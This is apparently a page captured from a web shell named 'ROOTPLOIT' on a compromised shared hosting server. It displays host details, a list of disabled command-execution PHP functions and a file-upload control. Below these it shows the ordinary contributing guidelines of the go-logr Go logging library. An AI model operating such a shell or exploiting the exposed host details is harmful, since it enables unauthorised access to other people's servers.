ROOTPLOIT
Server: LiteSpeed
System: Linux in-mum-web1878.main-hosting.eu 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: u435929562 (435929562)
PHP: 7.4.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: //opt/go/pkg/mod/github.com/go-logr/[email protected]/CONTRIBUTING.md
# Contributing

Logr is open to pull-requests, provided they fit within the intended scope of
the project.  Specifically, this library aims to be VERY small and minimalist,
with no external dependencies.

## Compatibility

This project intends to follow [semantic versioning](http://semver.org) and
is very strict about compatibility.  Any proposed changes MUST follow those
rules.

## Performance

As a logging library, logr must be as light-weight as possible.  Any proposed
code change must include results of running the [benchmark](./benchmark)
before and after the change.